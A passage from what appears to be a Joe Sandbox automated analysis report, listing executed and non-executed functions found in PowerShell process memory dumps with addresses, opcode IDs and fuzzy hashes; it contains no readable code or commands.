                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2146066872.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848f50000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 435ebb74a88b32b2d7758bd8452dc7479278eb14b7efa89e934ce996ab091737
                                                                        • Instruction ID: 2c1c74f516d33bd1d820c40794be815f39295b716822af2759f1ce7a08d02013
                                                                        • Opcode Fuzzy Hash: 435ebb74a88b32b2d7758bd8452dc7479278eb14b7efa89e934ce996ab091737
                                                                        • Instruction Fuzzy Hash: DBD13331E1EA8A5FE79AAB2858145B5BBE0EF16790F1801FED41DCB0D3EE1CA805C355
                                                                        Function 00007FF848E89EF3 Relevance: .3, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2145655512.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848e80000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 49d9b0c8c9b5b724122f2a7559aa1dbb886d3384ce21a43cda80775515836e01
                                                                        • Instruction ID: 3b0e21722913818942e9e9df24572ec7b488f3c3a71e90c10d80a203233b31e6
                                                                        • Opcode Fuzzy Hash: 49d9b0c8c9b5b724122f2a7559aa1dbb886d3384ce21a43cda80775515836e01
                                                                        • Instruction Fuzzy Hash: 1D812873D0D9965FE31EBB3CA8660F83750FF127A9F4C00B6D4884B093EE245856869A
                                                                        Function 00007FF848D6ED40 Relevance: .1, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2144987062.00007FF848D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848d6d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ffe0357799b18f757370c26768f67da57ae6a757220365b4171aa34f330f9db8
                                                                        • Instruction ID: c6f76aa781ab76cd1342a356b2953b4d04bf1850c85c46b87dfad803ae46adf5
                                                                        • Opcode Fuzzy Hash: ffe0357799b18f757370c26768f67da57ae6a757220365b4171aa34f330f9db8
                                                                        • Instruction Fuzzy Hash: 4E41087180EBC44FD756DB289841A563FF0EF57220F1505DFE088CB1A7D729A849CB92
                                                                        Function 00007FF848E89768 Relevance: .1, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2145655512.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848e80000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 667764d6b352000693175edc911062124182989b0440fe21449c971643af9cff
                                                                        • Instruction ID: b95171d97bf78b5dcf49e44c19d34f8f3458512996128debc137bc89636ad154
                                                                        • Opcode Fuzzy Hash: 667764d6b352000693175edc911062124182989b0440fe21449c971643af9cff
                                                                        • Instruction Fuzzy Hash: 4F31C63191CB489FDB1CEB5CA8066A97BE0FB99311F00422FE449D3252DB71A856CBC6
                                                                        Function 00007FF848E8A47C Relevance: .1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2145655512.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848e80000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2cb5b4a93b5ac425ee70b7266b64da30d36fbc816629ed67a0385e1282d6f6c1
                                                                        • Instruction ID: 8bea301c7ab3cbfedc30e2761565ee8b186c7d707e1a95b129c9aee857797663
                                                                        • Opcode Fuzzy Hash: 2cb5b4a93b5ac425ee70b7266b64da30d36fbc816629ed67a0385e1282d6f6c1
                                                                        • Instruction Fuzzy Hash: A021283190CB4C8FDB59DBAC984A7E97FF0EB96320F04416FD448C3152DA749456CB92
                                                                        Function 00007FF848E833B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2145655512.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848e80000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction ID: a525311bf5e0898e04d495dce5ac7619facc0d09e4621ee5b042099af78d6db2
                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction Fuzzy Hash: E701677111CB0D4FDB44EF0CE451AAAB7E0FB95364F50056DE58AC3651DB36E882CB45
                                                                        Function 00007FF848F5414D Relevance: .0, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2146066872.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848f50000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 233059e58f3298b43df4a3cdb063544195e78a857037735673907b4eb2b3e89a
                                                                        • Instruction ID: 4186eaea28019934cd7d2d6ba9709f59d311fafb3f0d88a933141480a0d86d97
                                                                        • Opcode Fuzzy Hash: 233059e58f3298b43df4a3cdb063544195e78a857037735673907b4eb2b3e89a
                                                                        • Instruction Fuzzy Hash: DCF09A32A0D5158FD759EB0CE4008E8B3E0FF64360F1200BAE01DC71A3CB26EC508B98
                                                                        Function 00007FF848F54400 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2146066872.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848f50000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ace62f0fea80afe6984a812306870371a8eddd43df814c966c7831d739d0d34
                                                                        • Instruction ID: 5e4c0c831bd6aa7f051ba0fe34c8696b0bfd8471fbdbf9433279516b1649863b
                                                                        • Opcode Fuzzy Hash: 6ace62f0fea80afe6984a812306870371a8eddd43df814c966c7831d739d0d34
                                                                        • Instruction Fuzzy Hash: D6F0BE31A4D5548FD758EB0CE4408A8B7F0FF44320B1100F6E00DCB0A3DB26AC608754
                                                                        Function 00007FF848F541D1 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2146066872.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848f50000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                        • Instruction ID: 36da586dc1632c2cadfc90628cbf2046a1312a3d82aab81f69ac2d01dc6b4590
                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                        • Instruction Fuzzy Hash: 43E01A31B0C8188FDA69EB0CE0409A9B3E1FBA8361B1101B7D14EC75A2CB22EC518B84

                                                                        Non-executed Functions

                                                                        Function 00007FF848E88995 Relevance: 5.1, Strings: 4, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2145655512.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848e80000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L_^$L_^$L_^$L_^
                                                                        • API String ID: 0-2357752022
                                                                        • Opcode ID: 1622e06a856c40fd4a4422ac98667979eb03bf89dbde15283d2660fde9d02f3c
                                                                        • Instruction ID: d9e349d3b9d34c24d7cc71363a1e65847b0f9afd87424dd8e5f6aa9631b41ac4
                                                                        • Opcode Fuzzy Hash: 1622e06a856c40fd4a4422ac98667979eb03bf89dbde15283d2660fde9d02f3c
                                                                        • Instruction Fuzzy Hash: 9041EAA3D0E6D25FE35AA6299C550E93F90FF127D4F4D40F7C5888B0C3EE28580B9256
                                                                        Function 00007FF848E88BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2145655512.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848e80000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L_^4$L_^7$L_^F$L_^J
                                                                        • API String ID: 0-3225005683
                                                                        • Opcode ID: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                        • Instruction ID: 17702d6d419c973b3dcfffe8cc1d69170a46e6d85154fa4015b62ff361fc743e
                                                                        • Opcode Fuzzy Hash: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                        • Instruction Fuzzy Hash: 422126F76488256ED3097BBDF8045FD3740DF942B4B49A2B2D2988B003EB1470868EE4

                                                                        Executed Functions

                                                                        Function 00007FF848F4660A Relevance: 1.7, Strings: 1, Instructions: 416COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2241820536.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848f40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: X7`[
                                                                        • API String ID: 0-2543708319
                                                                        • Opcode ID: 2f1675aa98733a9232d2b8089f44358ff34534f7f4e8de41f4f9f1b0a0147151
                                                                        • Instruction ID: c910aa73cd4d2737e2b2873f9ce8c5b46086a23f933521698f4e568b183a6528
                                                                        • Opcode Fuzzy Hash: 2f1675aa98733a9232d2b8089f44358ff34534f7f4e8de41f4f9f1b0a0147151
                                                                        • Instruction Fuzzy Hash: A2C14231E0EA8A5FF799AB2858145B57BE1EF25B90F1801BFD00DDB0C3EE1CA8048755
                                                                        Function 00007FF848F4664A Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2241820536.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848f40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: X7`[
                                                                        • API String ID: 0-2543708319
                                                                        • Opcode ID: 24e0b0dd763fdc504161e40d9c2eb008bb85018eb3abe032639482b2beff3f4f
                                                                        • Instruction ID: 45d4f84cfdce47b2ef6f3201e028881df9cba77c40f37cef5446f2d72de0287c
                                                                        • Opcode Fuzzy Hash: 24e0b0dd763fdc504161e40d9c2eb008bb85018eb3abe032639482b2beff3f4f
                                                                        • Instruction Fuzzy Hash: 9881F071E0EA8A5FF79AAB2854541747BA1EF25B80F6800FAD00DDB1C3EE1CAC048719
                                                                        Function 00007FF848D5EF00 Relevance: .1, Instructions: 128COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2240350788.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848d5d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1cc5a7323d89db6b2c9b1e075d458ed021248b76146ebe156a96a480bc05e75d
                                                                        • Instruction ID: 5b7594dc7baf52602288a99bf2c5fafdb50faf99cb1dd3ccef6c7f3d047b26b1
                                                                        • Opcode Fuzzy Hash: 1cc5a7323d89db6b2c9b1e075d458ed021248b76146ebe156a96a480bc05e75d
                                                                        • Instruction Fuzzy Hash: 7C410A7180EBC44FD7569B389855A527FF0EF57360F1901DFD088CB1A3DA25A849C7A2
                                                                        Function 00007FF848E79780 Relevance: .1, Instructions: 128COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2241096978.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848e70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 81ea2bf5411d54c2c136aae0712d7488e4e5ac4d1cc2d15ccaeae044cd7dfb99
                                                                        • Instruction ID: 83cdd0fb9e41481a5cc306444d48cf0f872b1c5ed8c386a6797e88cc1eb16994
                                                                        • Opcode Fuzzy Hash: 81ea2bf5411d54c2c136aae0712d7488e4e5ac4d1cc2d15ccaeae044cd7dfb99
                                                                        • Instruction Fuzzy Hash: 0531093191CB888FDB19DB1C98066A97BE0FB95310F00426FE449D3252CA74A816CBC6
                                                                        Function 00007FF848E7A49C Relevance: .1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2241096978.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848e70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a896fe916cba8460b54a8f296fb7bd43d30383cd7945edfe94997b0c214d63d
                                                                        • Instruction ID: 05e5968bf06c5021fcc15e7f05fc6b0d3bd8dc8d1f51d7401af2142cb25c48b2
                                                                        • Opcode Fuzzy Hash: 9a896fe916cba8460b54a8f296fb7bd43d30383cd7945edfe94997b0c214d63d
                                                                        • Instruction Fuzzy Hash: 2C21283190CB8C8FDB59DB6C984A7E97FE0EB96320F04416FD048C3152DA74A84ACB92
                                                                        Function 00007FF848E733B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2241096978.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848e70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                        • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                        • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45
                                                                        Function 00007FF848E7A0FB Relevance: .0, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2241096978.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848e70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f7fbcd684f3b66910b0a469ef7ea1da030d3aecc2cd56ad575e429c386ca79c1
                                                                        • Instruction ID: b2765a3aa4e43bc1fadf619a9d2197aa7e6f1d02c1ced1829d2f366acf6bbdfa
                                                                        • Opcode Fuzzy Hash: f7fbcd684f3b66910b0a469ef7ea1da030d3aecc2cd56ad575e429c386ca79c1
                                                                        • Instruction Fuzzy Hash: 0FF0247A95CA8C4FDB41EF3C98680E57FA0FF66201B0502EBD508C7021EB618848C781
                                                                        Function 00007FF848F4414D Relevance: .0, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2241820536.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848f40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d17d8053aaff5fbe8338b8d79cdd0c323500432d514a8c409ca4f1fd96344410
                                                                        • Instruction ID: f792091696503b3c5837913d903d6ebbde57f14096e40bc4b21711e6120e484a
                                                                        • Opcode Fuzzy Hash: d17d8053aaff5fbe8338b8d79cdd0c323500432d514a8c409ca4f1fd96344410
                                                                        • Instruction Fuzzy Hash: 63F09031A0D5058FD759EB0CE4004A473E0FFA4364B1100BBE01DD71A3CB25EC508758
                                                                        Function 00007FF848F44400 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2241820536.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848f40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 20fe35511f9e42a29a2dbba9e0e186e6189ed6a698095a14ebdf9c5b8cc13377
                                                                        • Instruction ID: 14bbc8b06583cdc9af6c6b15f6384f6dcad0b823c3a02df95b097d97b9b6c2f4
                                                                        • Opcode Fuzzy Hash: 20fe35511f9e42a29a2dbba9e0e186e6189ed6a698095a14ebdf9c5b8cc13377
                                                                        • Instruction Fuzzy Hash: DCF0BE31A0E5448FD754EB0CE4408A8B7F0FF54724B1100F7E109D70A3DB26AC608754
                                                                        Function 00007FF848F441D1 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2241820536.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848f40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                        • Instruction ID: d76d88544f8f17bf3ee0e6656c2ee5cd95f71ee8ab9b11c39950933bcc316587
                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                        • Instruction Fuzzy Hash: 94E01A31B0C8088FDA69EB0CE0409A973E1FBB8365B1101B7D14EE75A1CB22EC518B84

                                                                        Non-executed Functions

                                                                        Function 00007FF848E78BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2241096978.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ff848e70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                        • API String ID: 0-962139525
                                                                        • Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                        • Instruction ID: 63ad6347c9b35d5a557e4d70a1f235b63e22809effe47ae7a8015eb5b1719947
                                                                        • Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                        • Instruction Fuzzy Hash: 6721D7F3684925AED209366DB8419EC7780EF543B978A53F3E028CF153EE1864878A95

                                                                        Executed Functions

                                                                        Function 00007FF848F3431D Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2387823128.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848f30000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: B
                                                                        • API String ID: 0-1255198513
                                                                        • Opcode ID: d6a0685f235fbec44bb1ee5bc149adf2a36343c7977f51e76343ce67221c6e34
                                                                        • Instruction ID: ed6548c7259b8816f15f6c55dcf05a08955ca6b7800000d58f73c15d3ace191b
                                                                        • Opcode Fuzzy Hash: d6a0685f235fbec44bb1ee5bc149adf2a36343c7977f51e76343ce67221c6e34
                                                                        • Instruction Fuzzy Hash: 78513532E0DA894FE7A9EB6898156B47BE0EF753A0F0801FBD44DC71D3DA18AC158395
                                                                        Function 00007FF848F36605 Relevance: .4, Instructions: 433COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2387823128.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848f30000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d162ab21bfd1be3b797b7d589cf7da9bec93dd8fed822570346ff5c81e5ba3c
                                                                        • Instruction ID: 3c25d8b7abb462483c7ca3eef10e88b06861b84a368c2a21c5cad63c5bfbe894
                                                                        • Opcode Fuzzy Hash: 8d162ab21bfd1be3b797b7d589cf7da9bec93dd8fed822570346ff5c81e5ba3c
                                                                        • Instruction Fuzzy Hash: 8CD12231E1EB8A5FE79AAB2858145B57BA1EF16390F1801FFD44DCB0D3EE189805C365
                                                                        Function 00007FF848F34073 Relevance: .2, Instructions: 183COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2387823128.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848f30000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 688e810b7242287c9ff2827e5f9bbe38c3d40cd7830aa943c46b85807a0d117f
                                                                        • Instruction ID: ed450957b62fa3888b00ceb1615e225d3002dd36d904a10776f6bb1632ebdd51
                                                                        • Opcode Fuzzy Hash: 688e810b7242287c9ff2827e5f9bbe38c3d40cd7830aa943c46b85807a0d117f
                                                                        • Instruction Fuzzy Hash: 8B51F332A1DE4A4FE79AAB6C941167477E1EF75260F1801BBC00EC72D7DF14E8058359
                                                                        Function 00007FF848E69768 Relevance: .1, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2386803058.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848e60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 77863defa1cdfefd5ac78d91a20611144a692778cac58e3bc089a1cf6136ff06
                                                                        • Instruction ID: 3468543908fd4d037b52aabc7d6c1e138bf4555eb7a346a400fc55f9fce64562
                                                                        • Opcode Fuzzy Hash: 77863defa1cdfefd5ac78d91a20611144a692778cac58e3bc089a1cf6136ff06
                                                                        • Instruction Fuzzy Hash: DE31D63191CB489FDB1CAF5CA8066A97BE0FB99721F00422FE449D3251DB71B8568BC2
                                                                        Function 00007FF848D4ED40 Relevance: .1, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2385679767.00007FF848D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848d4d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2746f66d4c6bbc446b9365414116c1c3886a0e97880e15d2665dae2e5c12cbbb
                                                                        • Instruction ID: e2164e66103a57e516427e7c162d42582b51992200ea7a16002b9bc512502e23
                                                                        • Opcode Fuzzy Hash: 2746f66d4c6bbc446b9365414116c1c3886a0e97880e15d2665dae2e5c12cbbb
                                                                        • Instruction Fuzzy Hash: 1041193080EBC45FD7969B289C41A523FF0EF57260F1505DFD088CB1A7D725A84AC792
                                                                        Function 00007FF848E6A748 Relevance: .1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2386803058.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848e60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c6ff9677d1a4986a9f4fd5533188f5822d011d4860c40de1140ea54b5819f6fb
                                                                        • Instruction ID: 9b102d358258097f279fd50e0d5d8b8f2500e8c3a54672a0e96a90b2b6ce2a2d
                                                                        • Opcode Fuzzy Hash: c6ff9677d1a4986a9f4fd5533188f5822d011d4860c40de1140ea54b5819f6fb
                                                                        • Instruction Fuzzy Hash: 7321D03190CA4C8FDB58DF9C984A7E97BE0EBA5321F04812FD449C3152D670A456CB91
                                                                        Function 00007FF848F340BF Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2387823128.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848f30000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ab4f1fe9d19ab50508e1821b83c603c255dc3434efda644b2f00a89d2410ff64
                                                                        • Instruction ID: ef484ab0b4bd08fa59c698c807a30e8736ae6a0a8922fb55065f0a1fc56243b8
                                                                        • Opcode Fuzzy Hash: ab4f1fe9d19ab50508e1821b83c603c255dc3434efda644b2f00a89d2410ff64
                                                                        • Instruction Fuzzy Hash: 6521DD32E0DE874FE7ABAB58945017462D1FF742A0F5901BAC01EC72E6CF18EC448649
                                                                        Function 00007FF848E6A070 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2386803058.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848e60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c0359c691311337fa823cddd6c2bc21a69822fe266dc60d07ce0b03e9cfeba92
                                                                        • Instruction ID: 03e050416795a2abd6f641b6334fe8342ad4d496760ccf1f89de59f76004d86e
                                                                        • Opcode Fuzzy Hash: c0359c691311337fa823cddd6c2bc21a69822fe266dc60d07ce0b03e9cfeba92
